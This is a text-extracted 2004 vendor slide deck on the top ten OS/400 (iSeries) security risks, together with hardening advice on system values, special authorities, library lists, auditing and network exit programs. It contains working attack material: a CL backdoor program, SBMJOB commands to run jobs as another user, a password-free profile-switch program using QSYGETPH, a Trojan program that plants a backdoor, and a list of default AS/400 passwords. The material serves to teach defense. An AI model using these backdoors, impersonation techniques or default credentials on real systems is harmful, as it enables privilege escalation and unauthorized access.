top 10 os400 security risks

Copyright (c) 1999 - 2002 The Powertech Group 1

Definitive iSeries Security A P R E S E N T A T I O N

John EarlChief Technology Officer

The PowerTech Groupwww. powertech.com

john.earl@ powertech.com

Top 10 OS/400 Security Risks

October 2004


© 2003 PowerTech Group, Inc. All rights reserved.www.powertech.com [email protected]

Copyright & DisclaimerCopyright & Disclaimer

This information is meant for the edification of the OS/400 usercommunity. It is my sincere desire that you use this information to your advantage and make your systems more secure with it.

As with any software modification, you should test the impact ofthese recommendations before implementing them on production systems. Because every system is potentially different, neither I nor The PowerTech Group can assume any responsibility for any adverse effects of improperly tested implementations.

And finally, to protect our copyright (and out of common courtesy to the author), we respectfully request that you do not reproduce this material in any advertisement, web-site, or other printed format without the expresses written consent of the copyright holder.



PowerTech/IBM Relationship

> Multi-levelExecutive through developer

> Partner ProgramsSystem Mgmt Partner GroupAdvanced Development Partner

> Business with Global ServicesWorldwide agreement with IGSIGS recommends PowerTech with engagementsInstalled in IBM outsourced clients

> Installed in IBM San Jose, Rochester, NY,



HACKERS!!! Your Company

The Biggest Threatto your Corporate Data

or



Enterprise Security Evolution



Source Code for a Secret Terribleand Dastardly Hacking Program

> Source code for program: QSYS/QBACKDOOR:

> When compiled to adopt a powerful user’s authority, this program is dangerous without limits.

PGMCALL QCMD

ENDPGM



Top 10 OS/400 Security Risks

AgendaIntroductionIntroductionThe Top 101. User Identity Theft2. Powerful Users3. System Value Weaknesses4. Library and Library List Problems5. The Open Door Policy6. Promiscuous Object Ownership 7. Command Interface Abuse8. Trojan Horses9. No Audit Ability10. Unprotected Network Access

ConclusionConclusion



User Identity Theft

> There are 5 well known ways to steal an OS/400 User IDs.

From the difficult to the easy, they are:1. Use an OS/400 Job Description to masquerade as

the user2. Use the Submit Job Command (SBMJOB) to

masquerade as the user3. Use IBM API’s to Switch to the user (no password

required) 4. Sniff Network traffic to find clear text passwords5. Beg, borrow, steal or guess their password

1



User Identity Theft

Use an OS/400 Job Description to masquerade as the user.

A JOBD that has a User ID specifically attached to it represents the ability to run a job as that user…. Without knowing the users password.This exposure is only for those systems running at OS/400 QSECURITY level 30 and lower.

At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the Job Description.

Example:SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM

PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST)USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)

> Solution? Move to QSECURITY level 40 or higher.

1



User Identity Theft

Use the Submit Job Command (SBMJOB) to masquerade as the user

The SBMJOB command allows the submitter to specify the name of another user, and have the submitted job run using the assumed identity. All that is required is *USE (Read) authority to the target User Profile Object. Example:

SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST)USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) JOB(REPORT) JOBD(QGPL/QBATCH) USER(SALLY)

1



User Identity Theft

Use IBM API’s to Switch to the user (no password required)

The following code will allow me to become someone else without knowing their password.

Program QSYS/QASSUME

PGM PARM(&USER) DCL &USER *CHAR 10DCL &HANDLE *CHAR 10DCL &ERROR *CHAR 4CHGVAR %BIN(&ERROR) 0CALL 'QSYGETPH’ +

PARM(&USER *NOPWD &HANDLE &ERROR)CHGVAR %BIN(&ERROR) 0CALL 'QWTSETP’ PARM(&HANDLE &ERROR)

ENDPGM Censored !!!

1



User Identity Theft

Sniff Network traffic to find clear text passwords

Several Protocols submit User ID’s and Passwords in clear text

Among them are FTP, Telnet, and older forms of Client Access and PC Support

Minimize use of the legacy OS/400 Sign-on Screen (QDSIGNON)Set the Client Access “Bypass Signon” flag to yes, and the OS/400 system value for QRMTSIGN to “*VERIFY”Use VPN’s when communicating over un-secure networks

1



User Identity Theft

Beg, borrow, steal, or guess their password.

Password Protection is the Best Defense!AS/400 requires a password to in order to accessA solid password policy will prevent most breaches from the outside – and from nefarious insiders too.Don’t send passwords via email, or over un-secured networks.Require that passwords be changed at regular intervals.Don’t use default passwordsEVER

1



Subject: alt.2600 FAQ (1/3) #18/From: [email protected]: alt.2600 Message segment 18 of 63 - Get Previous / Next Segment - Get All 63 Segments

AS/400~~~~~~qsecofr qsecofr /* master security officer */qsysopr qsysopr /* system operator */qpgmr qpgmr /* default programmer */ibm passwordibm 2222ibm serviceqsecofr 1111111qsecofr 2222222qserv qservqsvr qsvrsecofr secofrqsrv ibmce

(Get All 63 Segments)

User Identity Theft

All of the Default passwords are well known!

1



User Identity Theft

Prevent Trivial Passwords:At a minimum, set these system values:System Value Name Value Description

QPWDEXPITV 90 90 DaysQPWDMINLEN 6 6 Character Minimum lengthQPWDRQDDGT 1 Require a digitQPWDRQDDIF 5 Unique in 10

Don’t go too wild with password rules (the QPWD* system values), or your users won’t remember their passwords!

1



PowerfulUsers

> Users can be made more powerful through the granting of OS/400 “Special Authorities”

Special Authorities can trump OS/400 object level authorities.

A USER WITH *ALLOBJ CAN READ, CHANGE, OR DELETEANY OBJECT ON THE SYSTEM.A USER WITH *SPLCTL CAN READ, CHANGE, OR DELETEANY SPOOL FILE ON THE SYSTEM.A USER WITH *JOBCTL CAN VIEW, CHANGE, OR STOP ANY JOB ON THE SYSTEM (INCLUDES ENDSBS AND PWRDWNSYS)A USER WITH *SAVSYS CAN READ OR DELETE ANY OBJECT ON THE SYSTEM.

2



PowerfulUsers

> What do special authorities do?*ALLOBJ - ALL authority to every object on the system – Game Over!*AUDIT - Authority to manipulate system auditing values.*IOSYSCFG - Authority to create and modify communications to the system.*JOBCTL- Authority to control other user’s jobs.

2



PowerfulUsers

>What do special authorities do?*SAVRST - Authority to Save,Restore, and remove any object on the system.*SECADM - Authority to change Profiles and Passwords*SERVICE - Authority to use the system service tools.*SPLCTL - *ALLOBJ authority for spool files.

2



System ValueWeaknesses

There are several system values must be set properly to protect your system.

Set the System Values to their most protective setting – and then toggle them off/on as needed.Monitor System Values to detect and alert you whenever they are changed.

Ensure that those system values are changed backMonitor for Toggle off / Toggle On conditionsMonitor what is done while System Values are toggled off

3




Signon ControlRegulate signon to prevent attacks

QDSPSGNINF = 1Display the signon information screen.

QINACTITV = 30Time out a screen after 30 idle minutes.

QINACTMSGQ = *DSCJOBWhen job is timed out, disconnect job and show signon screen.

QMAXSIGN = 3Maximum invalid signon attempts allowed.

QMAXSGNACN = 2Disable User after ‘N’ invalid signon attempts

QRMTSIGN = *VERIFYAllow user to bypass legacy signon screen.

3




Malicious Programs –Prevent Malicious programs from being loaded to your system by setting these system values:

QALWOBJRST = *NONEDo not allow sensitive program restore.

QFRCCVNRST = 1Force object conversion on restore.

QVFYOBJRST = 3Signed objects must be valid upon restore.

3




Operating System Integrity Setting –Use these Settings to ensure system Integrity at all times:

QSECURITY = 40 or 50QSECURITY supports 5 levels

10 = Physical Security 20 = Password Security30 = Resource Security 40 = Operating System Security50 = Enhanced Operating System Security

Do not allow programs to bypass OS security.

3



Libraries andLibrary Lists

Libraries are collections of data that a user can access.

If a user has *EXCLUDE authority to a library, they cannot access anything in that library.If a user has *USE authority to a library, they can read change or delete objects in that library

Assuming they have authority to the object itself.A user with *USE plus *ADD authority can place new objects into a libraryA user with *ALL authority can delete the library

Libraries are your first line of defense.Grant users no more than *USE authority to production librariesSpecify *EXCLUDE for sensitive libraries

4



Libraries andLibrary Lists

A library list specifies the order in which objects and files are searched for.The ability to place objects in a library that is higher on the library list (assuming *USE plus *ADD capability), represnts the ability to skirt many security designs

Example: If the library list contains LIBA, LIBB, and LIBCAnd security checking program PROGZ exists in LIBCAnd useer Fred has *USE + *ADD authority to LIBAUser Fred could place a bogus version of PROGZ into LIBA that bypasses security

Solution:Users only need *USE authority to libraries in their library list.This is especially true of libraries on the system portion of the library list (System Value QSYSLIBL)

4



The Open Door Policy

> Every OS/400 object specifies some kind of authority for a user called *PUBLIC?

WHO IS *PUBLIC?Any user of this computer who does not have explicit authority to a given object.

In the old days *PUBLIC was “Everyone in my company”.

Then as we networked to more and more systems, *PUBLIC became every one you do business with (Customers, Vendors, Partners, etc.)With virtually every network connected to every other network (it’s called “The Internet!”), *PUBLIC could be anyone in the WORLD that can connect to your network!!!

In a perfect world, *PUBLIC should have little or no authority to production applications.

5



> At a maximum, Business Application users need no more than;

*USE Authority to static objects such as:Programs, Display Files, Print Files, Work Management Objects, etc. All

static objects (those that do not contain data in one form or another) will work for users that have only change.

*CHANGE Authority to dynamic objects such as:Data Files, Data Areas, Data Queues, Message Queues, etc. Those things that regularly change as a matter of normal business.

> But ideally, don’t give *PUBLIC even read (*USE) authority to anything that you wouldn’t want published on the Internet tonight.

> Look at the QCRTAUT system value to see what authority *PUBLIC is given by default to newly created objects.

The Open Door Policy5



PromiscuousObject Ownership

> Promiscuous Object Ownership is where end users belong to a group profile that owns all of the application objects.

This plan makes it easy to administer security because everyone has all rights based solely on their membership in the ownership group.This plan often assumes that all application access will take place through a predefined menu interface – thereby restricting what a user can actually see and change.

6



PromiscuousObject Ownership

> Why is this a problem?Users are no longer locked into green screen interfaces and dumb terminals.There are numerous ways of getting at the data

Command Line accessDFU, DBU, EZView and other Data manipulation toolsQUERY/400, SQL, and othjer query toolsOthers???

Make sure that you’ve got all the back doors (and Windows!) covered as well.

6



Command Line Interface Abuse

> The ability to execute commands allows a user to skirt traditional menu limitations.

Commands can be entered in a variety of ways:1. OS/400 Command line (Call QCMD)2. OS/400 Screens that display a command line

(WRKOUTQ, WRKWTR etc.), or other applications with hidden command line access keys.

3. Through the use of the Attention Key.4. Using FTP to issue a command remotely.5. Using DDM to issue a command remotely.6. Using Client Access to issue a command remotely.

7



Command Line Interface Abuse

> Control user’s access to commands by…Use the Limited Capability parameter (LMTCPB) on the OS/400 user profile to limit items 1-4 on the previous page.

Assuming OS/400 V4R2 or higher.

Beware that items 5 and 6 on the previous page do not adhere to the LMTCPB parameter limitations

Use an exit program to limit DDM and Client Access commands.

Some users will still require Command line access.Programmers, Operators, Vendors, and selected Power Users

7



Command Line Interface Abuse7



A TrojanHorse

> Program QSYS/QTROJANQSYS/DCL &ALLOBJ *CHAR 10 QSYS/ DCL &COUNT *DEC (3 0) QSYS/ DCL &SPCAUT *CHAR 100 QSYS/ DCL &START *DEC (3 0) VALUE(1) QSYS/MONMSG CPF0000

QSYS/RTVUSRPRF SPCAUT(&SPCAUT) LOOP: IF (&COUNT *LE 10)

QSYS/ CHGVAR VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))QSYS/IF COND(&ALLOBJ = 'ALLOBJ') THEN(DO) QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +

OPTION(*NOSRC) GENOPT(*NOLIST) + USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) + AUT(*ALL)

QSYS/RETURN QSYS/ENDDO

QSYS/CHGVAR VAR(&COUNT) VALUE(&COUNT + 1) QSYS/CHGVAR VAR(&START) VALUE(&START + 10) QSYS/GOTO LOOP

Censored !!!



TrojanHorses

> A malicious person who hides a Trojan Horse on your system will (generally) have the following goals:

Have the program assume high levels of authorityBe able to run the program at willHide the program from the system administratorsHave the program execute often, and by a variety of users.

> An IBM exit point program that can be deleted (and/or replaced) by someone other than the System Administrator represents an opportunity for a Trojan Horse.

>> *USE*USE authority is sufficient to runrun these exit programs. Anything more, and you are at risk of introducing a Trojan Horse.

8



TrojanHorses

> System Values (WRKSYSVAL)QATNPGM - Attention programQPWDVLDPGM - Password validation programQRMTSIGN - Remote sign-on controlQSTRUPPGM - Startup program

> Network Values (CHGNETA)PCSACC - PC Support exit pointDDMACC - DDM exit point

> Registration Info (WRKREGINF)ADDEXITPRG - Add Exit Program

Hundreds of program opportunities here

8



TrojanHorses

> Message Files (CHGMSGD)DFTPGM parameter allows a default handling program.

10’s of thousands of Message Queue’s.

> Subsystems (CHGSBSD)Routing and Communication Entries contain program names.

> Database Triggers (ADDPFTRG)Use PRTTRGPGM to monitor trigger usage

> Command Exit ProgramsMonitor command exits (V4R5) and validation programs

Over 2000 OS/400 commands

8



No AuditAbility

> If you had a security problem, would you know?Who did it?What happened?When it happened?How it was done?How to stop it from happening again?

> What if the data was not damaged, but only stolen?

9



No AuditAbility

> In order to prevent security breaches, you must first be able to detect them.

> Use the OS/400 security auditing journal (QAUDJRN) to help determine where your security stands.

Why?It’s free (from IBM)It’s a comprehensive gathering toolIt’s an irrefutable source of historical events.

9



No AuditAbility

> Turn on OS/400 Security Auditing by typing:CHGSECAUD QAUDCTL(*AUDLVL) +

QAUDLVL(*AUTFAIL *CREATE *DELETE +*JOBDTA *NETCMN *OBJMGT + *OFCSRV *OPTICAL *PGMADP + *PGMFAIL *PRTDTA*SAVRST +*SECURITY *SERVICE *SPLFDTA + *SYSMGT ) +

INLJRNRCV(SECURLIB/AUDRCV0001)

> This will generate a lot of audit trails> Use toolstools to sift through the audit trails to find

important events. > If at all possible, save allall security journal receivers. > Make sure QAUDENDACN is *NOTIFY.

9



UnprotectedNetwork Access

> Some facts about iSeries SecurityDB2/400 database is integrated with the operating system. Users have all of the authority that their group ID’s carry, and in many purchased software applications, Group ID’s own the application data.OS/400 ships with all of it’s TCP/IP services turned on. These network services provide authorized users access to application data.If you do not have Exit Programs in place, you likely are at risk of sharing OS/400 data with every user on your networkPowerLock NetworkSecurity is an iSeries host based Access Control and Monitoring software package that protects application data from too-powerful users.

10




> Most AS/400’s rely on menu securityIt was easy to buildIt’s the ‘legacy’ of many S36 and S/38 applications

> Most menu ‘Security’ designs assume:AllAll access is through the application menu.No users have command line access.Query access is limited or denied completely.That the user is a member of the groupuser is a member of the group that owns the objects. Or*PUBLIC has Broad access to the data

10




> Menu Security is no longer relevant in a networked environment.

Users are all using PC’s not dumb terminalsPC’s have sophisticated data access tools like FTP, ODBC, Remote Command and more.End users are much more sophisticated – many hit the workforce with a pre-existing familiarity with these tools.

> Don’t believe that the 5250 green screen is the “End” of your security responsibility.

10



Application MenuCRM

Result: Too Much Access10



UnprotectedNetwork Access10




CLIENT ACCESS/400*Get File transferPut File TransferRemote CommandODBCData Queue access

NetServerWindows Network NeighborhoodShared FoldersShared Printers

FTPGet FilePut FileDelete FileDelete LibraryRemote Command

DDM Copy FileRemote CommandDRDAShared FoldersEtc.

Some of the network access methods…

There are over 250 access points to an iSeries database!

10



How do you regulate network access to data?> Implement Exit Programs on network access points like

FTP, ODBC, DDM, etc.Exit Programs can

Will protect systems that are reliant solely on menu security.Can be used to limit what trading partners can see when they access your system.Monitor access that normally fly beneath your radarStops unwanted activity even when you’re not around.Provide “defense in depth” security beyond traditional controls

UnprotectedNetwork Access10




A point in a process where control can be passed to a user-supplied program. The user-supplied program can usually perform processing that overrides or compliments the processing done by the main process.

User specified exit program

Analyze request & return result

(pass/fail)

What is an exit point anyway?

Main program

IBM’s FTP Server1. User requests data:2. FTP Server calls exit

program

3. Exit Program returns resultContinue processing...

10



iSeries Network Access with Network Security in Place

FTP ServerTELNET ServerDatabase Server

DDM Server

DRDA Server

EXIT

PROGRAM

Network Security software that controls and monitors access to the iSeries through the network interfaces.

File xfer Server

SQL Server

10



EMPLOYEES

SUPPLIERS

DISTRIBUTORS

Prevent Data Theft and Loss

Provides:

Visibility to Network activity

Control of Network Activity

Security Monitoring

10



Conclusions

> Security on OS/400 doesn’t just happen, you have to make it happen.

> OS/400 has the best Security tools available, so let’s use them

> You can’t play in e-business unless you guard against network access

> If you are compromised, will you know?> Secure network access points before

someone else discovers the exposure.



Contact Info:John Earl

Chief Technology OfficerThe PowerTech Group

[email protected] x302

Thank You

top 10 os400 security risks

Documents